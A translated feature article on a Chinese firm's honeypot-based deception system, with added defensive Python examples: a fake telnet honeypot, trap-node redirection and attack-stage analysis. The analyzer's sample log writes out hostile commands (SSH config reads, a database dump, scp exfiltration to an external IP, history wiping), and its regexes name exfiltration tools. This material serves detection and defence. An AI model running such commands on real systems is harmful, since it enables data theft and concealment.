
The highest form of warfare is to attack the enemy's strategy; the next, to attack his alliances; the next, to attack his army; the lowest is to attack his cities. (Sun Tzu, The Art of War, "Attack by Stratagem")

Introduction

Some professions are naturally respected because they are bound up with some excellent human quality. Dance calls to mind a beautiful body; long-distance running calls to mind perseverance. And hackers call to mind superb technical skill.

Every individual and organization in the real world has a city of its own, large or small, on the map of the online world. And in that sinister Internet jungle, every city may at any moment face arrows shot from the darkness.

In this world, as in the jianghu of martial-arts fiction, there has always been a line between good and evil.

Evil hackers lead bandits into the city to burn, kill and loot; righteous hackers stand tall on the city walls, weapons in hand, and shoot the invaders down.

It is true that most people associate hackers with superb technique. But once you truly understand the desperate battles of the cyber world, you will see that the highest praise for a hacker is not the skill to storm a city, but the wisdom to subdue the enemy without fighting.

Zhuge Liang did not spend a single soldier; with the sound of a zither alone he turned back Sima Yi's hundred-thousand-strong army and saved the day.


Eisenhower's deception plan pinned the German main force at Calais, and so made possible the day of glory for mankind: the Normandy landings.


The dream-makers in Inception planted an idea in the subconscious of Fischer, heir to an energy giant, so that he dissolved his father's company of his own accord.

As The Art of War puts it: to besiege a city is the lowest strategy; to attack the heart is the highest.

The "deception system" of China's hackers

The world of hackers is attractive precisely because every fantasy we have in the real world plays out here. Break into a company and obtain a mass of confidential information, and you can deal a rival a fatal blow in the marketplace.

This is a true story. A well-known company's board had just ended a meeting, and the minutes were already on a competitor's desk. A document the chairman had just written had not yet been printed and distributed inside his own company, and the rival had already circulated it across theirs. Before the latest phone prototype his company had designed went into production, the rival had already copied it from the drawings and taken the market.

Behind almost every commercial competition we see lies an unspeakable, bloody battle in the cyber world, and that battle may decide a person's rise or fall, honor or disgrace, for life. For that prize, evil hackers will use the most vicious tricks to penetrate and intrude.

What keeps this world from being hopeless is that righteous hackers have stepped forward and, of their own accord, built a powerful net to fight evil. Among them are the first-generation Chinese hackers CP and la0wang, who have kept a low profile for more than a decade and used their skills to profoundly change China's position in world politics; the security veteran Oscar, who once led Tencent's fight against the online black market; and Jannock, the top contributor on WooYun, who could walk through any website with a string of code.

In 2014 these hackers, who represent the strongest hacker firepower in China, came together and formed a "gang" called Jinxing Technology. The gang's primary goal is to eliminate the dirty attacks and rampant information theft that hackers and mercenaries inflict on companies.

And their signature weapon is a "cyberspace deception system": Huanyun.

Philosophically, every achievement in this world comes from certainty of information. For example:

If you can see through the moves your opponent will make next, you are sure to win;


If you can hear what the goddess you admire is thinking, your odds when you confess your feelings go up;


If you know for certain which stock will rise tomorrow, you are certain to double your money.

But what if the information you believe to be certain is actually fake? Let your opponent believe he holds certain information about you, while in fact it is an illusion you created, and you already hold an absolute advantage in defense.

Simply put, Huanyun tries to build exactly such a deception system: the intruding hacker believes he has entered the company, but in fact he has entered a carefully constructed virtual world, a dream space like the palm of the Tathagata Buddha, a glass house in which every step he takes exposes a little more of himself.

Honeypot, honeynet and honey field

Having laid out so much deception philosophy, how is it put into practice?

Leifeng Net's Zhaike Channel had the chance to talk with several of the leading figures at Jinxing Technology. They described three interesting concepts: honeypot, honeynet and honey field.

Honeypot

Honeypot is a vivid word: in Chinese it is honey + jar, and the English word is likewise honey + pot.

Honey stands for the sweet bait, the characteristics an attacker may be interested in; the pot stands for an environment through which the intruder's behavior can be captured.

Figuratively, it is like the Venus flytrap native to the Americas: it uses a sweet scent to attract flies to feed, but once a fly enters the trap, its fate takes a sharp turn.

Although hackers who enter a honeypot will not be buried there, they leave behind their attack tools and attack traces. After studying the tools hackers use, defenders can readily develop corresponding countermeasures, much as the human body gains immunity to a new virus. That was the simple primer Hu Peng, product director of Jinxing Technology, gave Leifeng Net's Zhaike Channel.

Honeypots are generally divided into low-interaction and high-interaction honeypots. Low-interaction honeypots are generally used to raise alarms or capture attack code; high-interaction honeypots are used to observe attacker behavior in depth and analyze it.
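What a low-interaction honeypot of the kind just described looks like in practice, as an added example (not Jinxing Technology's code): a fake telnet login that serves nothing real, rejects every password, and records the source address and every credential pair tried. The banner text and the port are assumptions chosen for the example; the capture logic is kept in pure functions so it can be exercised without a network.

```python
"""Low-interaction "fake telnet login" honeypot (added example).

The service is not real: it prints a banner, asks for a username and
password up to MAX_ATTEMPTS times, always answers "Login incorrect", and
writes one JSON record per session with the source address and every
credential pair tried.  Banner and port are assumed values."""
import json
import socketserver
import time

BANNER = b"Ubuntu 16.04.2 LTS\r\nlogin: "       # assumed, purely decorative
PASSWORD_PROMPT = b"Password: "
REJECT = b"\r\nLogin incorrect\r\n\r\nlogin: "
MAX_ATTEMPTS = 3


def parse_login_attempts(data: bytes, max_attempts: int = MAX_ATTEMPTS) -> list:
    """Split the raw bytes an attacker typed into (username, password) pairs.

    Lines alternate username / password because that is what the prompts
    invite.  An unfinished trailing line and a username without a password
    are dropped; attempts beyond max_attempts are ignored."""
    text = data.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
    lines = text.split(b"\n")
    lines.pop()                      # split leaves the unfinished tail (or "") last
    fields = [l.decode("utf-8", "replace") for l in lines]
    pairs = list(zip(fields[0::2], fields[1::2]))
    return pairs[:max_attempts]


def build_record(peer: tuple, data: bytes, ts: float = None) -> dict:
    """One log record per session.  The raw bytes are kept as hex too, so
    nothing the parser's assumptions discard is lost for later analysis."""
    return {
        "ts": time.time() if ts is None else ts,
        "src_ip": peer[0],
        "src_port": peer[1],
        "attempts": [{"user": u, "password": p}
                     for u, p in parse_login_attempts(data)],
        "raw_hex": data.hex(),
    }


class FakeTelnetHandler(socketserver.StreamRequestHandler):
    timeout = 30     # drop attackers that go idle; the record is still written

    def handle(self):
        captured = b""
        try:
            self.wfile.write(BANNER)
            for _ in range(MAX_ATTEMPTS):
                user = self.rfile.readline()
                if not user:
                    break
                captured += user
                self.wfile.write(PASSWORD_PROMPT)
                password = self.rfile.readline()
                if not password:
                    break
                captured += password
                self.wfile.write(REJECT)
        except OSError:
            pass                     # timeout or reset: keep what we have
        finally:
            # stdout is the log sink here; ship it to a SIEM in practice
            print(json.dumps(build_record(self.client_address, captured)), flush=True)


class HoneypotServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True       # must be set before bind, hence a subclass


def serve(host: str = "0.0.0.0", port: int = 2323) -> None:
    """Listen on an unprivileged port; redirect tcp/23 to it at the firewall."""
    with HoneypotServer((host, port), FakeTelnetHandler) as srv:
        srv.serve_forever()


if __name__ == "__main__":
    serve()
```

The captured credentials are the "attack code" such a pot exists to collect. Note what it gives away: a fixed banner, a service that rejects every password, and identical timing on every attempt. A scanner that has seen this banner once can recognise it everywhere, which is precisely the weakness of single honeypots discussed next.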


Overall, though, the problem with honeypots is that the environment is too uniform and its features too obvious, so attackers identify it easily.

Imagine that every fly remembered the shape of the Venus flytrap: from then on the flytrap would catch nothing but bricks and stones.

Honeynet

Simply put, a honeynet is an organized set of honeypots, a deception network built from many of them. Hackers cannot rely on sight in cyberspace. They are like a thief sneaking into a dark villa, where every furnishing has to be touched by hand and marked, drawing the internal map of the villa as they "imagine" it.

If the intruder is an experienced repeat offender who touches a fake door and finds nothing behind it, he can conclude that the door is a honeypot.

But if different honeypots are combined into a honeynet, the thief believes there is a room behind the door, furnished with a wardrobe, a sofa, a desk and so on. While the thief works, the honeynet's operator has more time to observe the visitor and wait for him to bring out more offensive tools, so that a more complete defensive weapon can be built.

But, to continue the metaphor, the honeynet is only a virtual room inside what is otherwise a real villa. Before reaching it, the thief inevitably passes through other, real rooms. Since the honeynet sits inside the company's real systems, the company can still be compromised.

Hence the honey field.

Honey field

A honey field uses honeypots and honeynets to simulate the entire architecture of a company. It amounts to rebuilding the corporate villa and placing a portal (a redirector) in front of it. Once a possible attack is detected, the hacker's traffic is diverted straight into the fake villa, the honey field.

Once the hacker is inside the honey field, everything he wants can be "found". The core business data he wants is on the desk, the financial statements he wants are in the safe, and the organization chart he wants is on the bookshelf.

All of it is an illusion modeled on the company's real situation, and of course all the data is fake. How closely does this fake "honey field" resemble the company's real environment?

la0wang (Wang Junqing), chief security officer of Jinxing Technology, told Leifeng Net's Zhaike Channel:

A honey field does not actually have to be 100% identical to the company's real network architecture; it should be 100% identical to the company network architecture the hacker imagines. Because the hacker has never seen the company's real network, he can only compare what he touches against his imagination. The closer it is to what he imagines, the less he suspects he has broken into a fake system.

[Logical structure of honeypot, honeynet, honey field]

"Inception" within the honey field: Huanyun

The concept of a honey field is easy enough to grasp. But the most important step for a good "deception system" is precisely the first one: leading hackers into this "Inception space".

Because the company's internal network has to keep operating normally, it must serve the good people who have permission, while promptly leading the bad people into another "deception system" in time and space: Huanyun.

So an important capability a corporate intranet must have is telling good people from bad.

For this, these veteran hackers designed a sophisticated verification system.

We have done security testing for nearly twenty years, often trying to break through a system's defenses without the other side's frontline staff being aware of it at all, so our understanding of attackers is very deep. We can tell clearly which behaviors are normal and which are only ever done by intruders.


These characteristics are not obvious actions; they may be a very small port-probing action or an unusual query pattern, just as an old detective can pin down a thief from one small gesture.

la0wang said.

Back to the thief and the villa. After entering, the thief touches several identical doors. He cannot tell which door has valuables behind it, so his approach must be to try prying several of them. One door opens without much effort, and the thief will certainly choose to enter that room first and have a look.

Yes, that easiest-to-pry door is precisely the entrance to the honey field.

Once he has been steered into the honey field, the thief's world is swapped out from under him. Even if he quickly leaves the house, everything outside has been quietly replaced by the honey field.

I don't need every real door lock to be very strong; I only need every real lock to be stronger than the lock on the door that leads to Huanyun. That is enough.

said la0wang.

In professional terms this false door is called a trapping node. Trapping nodes can in fact be deployed in many parts of the network environment, such as the office network, the DMZ (isolation zone) and the core data zone. As soon as an intruder hits any node, he is instantly diverted into "Inception" and can never get back.
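The decision and the diversion described above, as an added example that is not Jinxing Technology's Huanyun code: a trapping node is an address that no legitimate workflow ever touches, so a single connection to it is a sufficient verdict, and the "very small port-probing action" la0wang mentions is modelled as a second, weaker signal. Flagged sources are then turned into nftables DNAT rules that send all of their traffic to the honey field. The zones, addresses, scan threshold, flow records and the honey-field gateway are all assumptions constructed for the example.

```python
"""Trapping-node decision engine with honey-field redirection (added example).

A trapping node is an address no legitimate workflow ever uses, so one
connection to it is a sufficient verdict; a burst of distinct ports on one
host (a port scan) is a second, weaker signal.  Flagged sources become
nftables DNAT rules that steer all of their traffic to the honey field.
Zones, addresses, the threshold and the gateway are assumed values."""
from collections import defaultdict
from ipaddress import ip_address

# Assumed trapping nodes per zone (RFC 1918 / RFC 5737 addresses).
TRAP_NODES = {
    "office":    {"10.1.0.250"},
    "dmz":       {"192.0.2.250"},
    "core_data": {"10.9.0.250"},
}
HONEY_FIELD_GW = "10.200.0.1"    # assumed entry point of the honey field
SCAN_PORT_THRESHOLD = 10         # distinct dports on one host => scan

# Constructed flow records (src, dst, dport).  A real feed would be NetFlow
# or Zeek conn.log; only this tuple shape is needed here.
SAMPLE_FLOWS = [
    ("10.1.0.23", "10.1.0.5", 445),      # ordinary file-share traffic
    ("10.1.0.23", "10.1.0.5", 445),
    ("10.1.0.77", "10.1.0.250", 22),     # touches the office trap node
    ("10.1.0.77", "10.1.0.5", 445),
] + [("10.1.0.88", "10.1.0.5", p) for p in range(20, 40)]   # 20 ports: scan


def trap_node_zone(dst: str):
    """Zone of the trapping node at dst, or None if dst is a real host."""
    for zone, hosts in TRAP_NODES.items():
        if dst in hosts:
            return zone
    return None


def classify(flows) -> dict:
    """Map each intruder source to the first reason it was flagged.

    Trap-node contact wins over scan evidence because it is unambiguous:
    nothing legitimate has any reason to be there."""
    verdicts = {}
    ports_seen = defaultdict(set)
    for src, dst, dport in flows:
        zone = trap_node_zone(dst)
        if zone is not None and src not in verdicts:
            verdicts[src] = f"touched trap node {dst} in {zone}"
        ports_seen[(src, dst)].add(dport)
    for (src, dst), ports in ports_seen.items():
        if len(ports) >= SCAN_PORT_THRESHOLD and src not in verdicts:
            verdicts[src] = f"port scan: {len(ports)} ports on {dst}"
    return verdicts


def nft_redirect_rules(verdicts: dict) -> list:
    """nftables commands that DNAT every new flow from a flagged source to
    the honey-field gateway.  "add table"/"add chain" are no-ops if the
    objects already exist; each per-source rule carries its reason as a
    comment so an analyst can see why the source was diverted."""
    rules = [
        "add table ip nat",
        "add chain ip nat prerouting { type nat hook prerouting priority -100; }",
    ]
    for src in sorted(verdicts, key=ip_address):
        rules.append(
            f"add rule ip nat prerouting ip saddr {src} counter "
            f"dnat to {HONEY_FIELD_GW} comment \"{verdicts[src]}\""
        )
    return rules


if __name__ == "__main__":
    for line in nft_redirect_rules(classify(SAMPLE_FLOWS)):
        print(line)
```

Two practical points the page's wording implies: the verdict must be sticky (the rule stays after the triggering flow ends, so the intruder "can never get back"), and trap addresses must genuinely be unused, since any inventory scanner or monitoring probe that touches them would be diverted too and needs an explicit exception. A blanket DNAT also changes the intruder's view of hosts he already touched before the verdict; a production redirector would have to keep those consistent.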

[Attack Stream Redirection Schematic]

Our goal: take the fight to the hacker

Now that you're here, don't leave.

That must be what the deception system wants to say to intruders.

Because it provides a realistic environment, hackers not only fail to doubt their surroundings but grow complacent about their own skill. And that is the perfect moment to monitor them.

[Screenshot of the Fantasy Cloud System]

Take a photo: a panoramic video of the hacker

While the hacker proudly roams Huanyun, the system records network data, host data and all kinds of behavioral data throughout the attack.

The data is so detailed it borders on excessive. Hu Peng explained: The ratio of data we collect is 1:50. What does that ratio mean? For example, when we capture one attacker command, we simultaneously obtain related information from nearly 50 items, including auxiliary information, associated information, environmental information and so on. We save all the data related to that command.


Why do this? Because the attack process is very valuable, especially the whole process of intranet penetration; if we did not save this much data, later analysis might suffer. If we save enough data, it lays a solid data foundation for later analysis. So we decided to save attack data in full detail.

Of course, the entire collection process must be completely silent. Once an attacker notices a flaw, he is likely to leave immediately, or to do many things intended to confuse his opponent.

la0wang said:

We use very covert, traceless monitoring technology, like a house with vibration sensors under the floor. The hacker sees nothing in the room, yet his every move is recorded through the vibrations. Attackers can happily attack in our environment, and we can happily collect attacker behavior data. Why not?

Look at the photos: judging attack intent from "context"

With a rich and detailed data foundation, behavioral analysis can begin. One of the interesting techniques in its design is the attacker's "context".

A brief example:

Here is a screenshot of a WeChat conversation. From it you can see that the person on the right wants to borrow 5,000 yuan from Brother Quan on the left. Is that really so? Look at the second picture:

After the second picture we realize that Brother Quan on the left owed the other person money and refused to repay it, went back on his word and deliberately denied it. The full story of the unpaid debt is long and colorful; for lack of space only one passage is shown here. What does this example illustrate?

If we are not in a continuous, complete context, the results of our analysis of the data are very likely to be wrong.

A complete attack context therefore includes the behavioral context, the time of the attack, the business scenario, the target object and other contextual factors related to the attack.

Hu Peng gave us a few simple examples:

Business scenario: our deception environment is made up of different business scenarios, such as the office zone, the DMZ and the core data zone. The same action in different scenarios has a different meaning, so our analysis is carried out within a specific business scenario.

Important stages: during an attack, the attacker shows different behavioral characteristics at different stages, such as reconnaissance on entering the intranet, penetration after reconnaissance, data acquisition after success, and clearing traces on leaving. These are all important stages of the attack process. Analyzing them lets us organize an orderly process out of the mass of data, and the results of the whole analysis become clearer.

Key path: an attack forms a certain path, that is, how the attacker reaches the target step by step and which key positions are passed. For example, how does the attacker choose between different paths, such as how to get from the office zone into the core data zone? The attacker first needs to find the machine of an operations engineer or administrator to get in, so that operations engineer or administrator is the key point on the attack path. Analyzing the key path reveals the attacker's offensive thinking and attack skills.

Habit features: attackers inevitably show personal habits when attacking, for instance in the commands they type. Some attackers habitually check whether other users are online right after entering, some habitually check processes at regular intervals, and some flip through files as soon as they get in. Starting from these features we can analyze the attacker's habits and use them to build a profile of the attacker.
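The four kinds of context Hu Peng lists, worked through in code as an added example that is not Jinxing Technology's analysis engine. Each record is one command the attacker ran inside the honey field, with the host and zone it ran on. The analyzer labels the stage of each command, rebuilds the path between zones and the key host where the pivot happened, weights the same action differently by zone, and extracts a habit fingerprint (what the operator does first on every new host). The session log, host names, zones, stage rules and weights are all constructed for the example.

```python
"""Attack-context reconstruction over honey-field session logs (added example).

Each record is (ts, host, zone, command).  The analyzer labels stages,
rebuilds the key path between zones, weights the same command by the zone
it ran in, and extracts a habit fingerprint.  Everything here is a
constructed illustration, not the product's data or rules."""
import re

# Constructed session log: (ts, host, zone, command)
SESSION_LOG = [
    (1,  "pc-office-12", "office",    "whoami"),
    (2,  "pc-office-12", "office",    "w"),
    (3,  "pc-office-12", "office",    "arp -a"),
    (4,  "pc-office-12", "office",    "nmap -p 22 10.1.0.0/24"),
    (5,  "pc-office-12", "office",    "ssh ops@10.1.0.40"),
    (6,  "ops-admin-01", "office",    "whoami"),
    (7,  "ops-admin-01", "office",    "w"),
    (8,  "ops-admin-01", "office",    "cat ~/.ssh/config"),
    (9,  "ops-admin-01", "office",    "ssh root@10.9.0.12"),
    (10, "db-core-03",   "core_data", "whoami"),
    (11, "db-core-03",   "core_data", "w"),
    (12, "db-core-03",   "core_data", "mysqldump -u root finance > /tmp/f.sql"),
    (13, "db-core-03",   "core_data", "scp /tmp/f.sql 203.0.113.9:/tmp/"),
    (14, "db-core-03",   "core_data", "history -c"),
]

# Stage rules, most specific first (order matters: "ssh" must not count as recon).
STAGE_RULES = [
    ("cleanup",      re.compile(r"^(history -c|unset HISTFILE|rm .*(\.bash_history|/var/log))")),
    ("exfiltration", re.compile(r"^(scp|rsync|nc|ncat|curl .*-T)\b")),
    ("collection",   re.compile(r"^(mysqldump|tar |zip |cat .*(passwd|shadow|\.ssh))")),
    ("lateral",      re.compile(r"^(ssh|psexec|wmic|smbclient)\b")),
    ("recon",        re.compile(r"^(whoami|w|id|arp|nmap|netstat|ss|ps|ifconfig|ip)\b")),
]
STAGE_WEIGHT = {"recon": 1, "lateral": 2, "cleanup": 2, "collection": 3,
                "exfiltration": 4, "other": 0}
ZONE_WEIGHT = {"office": 1, "dmz": 2, "core_data": 3}   # same act, different zone


def stage_of(cmd: str) -> str:
    for stage, rx in STAGE_RULES:
        if rx.search(cmd):
            return stage
    return "other"


def label_stages(log):
    """Each record extended with its stage label."""
    return [(ts, host, zone, cmd, stage_of(cmd)) for ts, host, zone, cmd in log]


def attack_path(log):
    """Ordered (host, zone) hops with consecutive repeats collapsed."""
    path = []
    for _, host, zone, _ in log:
        if not path or path[-1] != (host, zone):
            path.append((host, zone))
    return path


def key_hosts(log):
    """Hosts from which the attacker pivoted into a different zone: the
    administrator's machine in the text's example."""
    path = attack_path(log)
    return [path[i][0] for i in range(len(path) - 1)
            if path[i][1] != path[i + 1][1]]


def risk_score(log) -> int:
    """Stage weight times zone weight: a dump in core_data counts for more
    than the identical command typed in the office zone."""
    return sum(STAGE_WEIGHT[stage] * ZONE_WEIGHT[zone]
               for _, _, zone, _, stage in label_stages(log))


def habit_fingerprint(log, n: int = 2) -> dict:
    """First n command names after landing on each host.  A prefix that is
    identical on every host belongs to the operator, not the environment."""
    firsts = {}
    for _, host, _, cmd in log:
        seq = firsts.setdefault(host, [])
        if len(seq) < n:
            seq.append(cmd.split()[0])
    seqs = list(firsts.values())
    common = seqs[0] if seqs and all(s == seqs[0] for s in seqs) else None
    return {"per_host": firsts, "common_prefix": common}


if __name__ == "__main__":
    for rec in label_stages(SESSION_LOG):
        print(rec)
    print("path:", attack_path(SESSION_LOG))
    print("key hosts:", key_hosts(SESSION_LOG))
    print("risk:", risk_score(SESSION_LOG))
    print("habit:", habit_fingerprint(SESSION_LOG))
```

On this constructed log the path is office workstation, then the operations host (the key host, since that is where the zone changes), then the core database; the same `whoami` followed by `w` opens every host, which is the "checks whether other users are online after entering" habit from the list above and is what you would carry into a profile of the operator.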

Find the protagonist: tracing the hacker

With the actions above, the defender obtains valuable information, namely:

The attacker's source: where did he launch the attack from?

The attacker's thinking: what path did he choose to reach, step by step, the information he wanted?

The attacker's identity: what tools he used and what attack characteristics he showed.

The evidence: a record of everything he did.

With this information the intruder's identity and background can, in principle, be pinned down. From that moment the battle in the cyber world is decided. What remains is for law and justice to deal with the hacker in the real world.

Summary: interview notes

The online world is a replica of the real one. Almost everyone admits this sad conclusion: wherever there are people, there are conspiracies and frame-ups.

Unfortunately, the online world is vaster and more complex than the real one, and the light of justice cannot reach every fold of this space. More often it is like a dark forest, and we must arm ourselves against the bullets that come out of the darkness.

As the saying goes, "the great Way is simple". Although cyberspace was imported into China, "deception-based defense" is rooted in China's own philosophy of war. In this respect, the efforts of China's righteous hackers deserve admiration.

The best weapon against violence is not violence, but deception.